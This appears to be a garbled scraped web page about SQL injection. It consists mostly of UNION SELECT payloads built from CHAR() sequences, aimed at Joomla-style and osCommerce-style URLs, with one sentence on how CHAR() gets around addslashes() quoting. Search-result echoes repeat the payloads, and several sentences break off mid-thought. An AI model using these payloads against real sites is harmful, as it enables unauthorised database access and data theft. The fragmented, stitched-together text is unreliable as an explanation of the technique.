Index.php?option=%27com_users1111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20--%20

SQL's Char() function comes in handy when (for example) addslashes() for is used as a precautionary measure within the SQL query. Using Char() removes the need of quotation marks within the injected query. An example of some code vulnerable to an SQL injection using Char() would look. /index.?osCsid=8919253b58391519a47714fb514b66e5&cPath= 82_330_2591111111111111%22%20UNION%20SELECT%20CHAR(45,120, 49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR( 45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45). 0 results found for "PE1111111111111" UNION SELECT CHAR(45,120,49,45,81 ,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45 ,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55 ,45,81,45) -- /* order by "as". 0 results found for "I1111111111111" UNION SELECT CHAR(45,120,49,45,81, 45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45, 81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55, 45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45) -".

Related Topics

Recently Viewed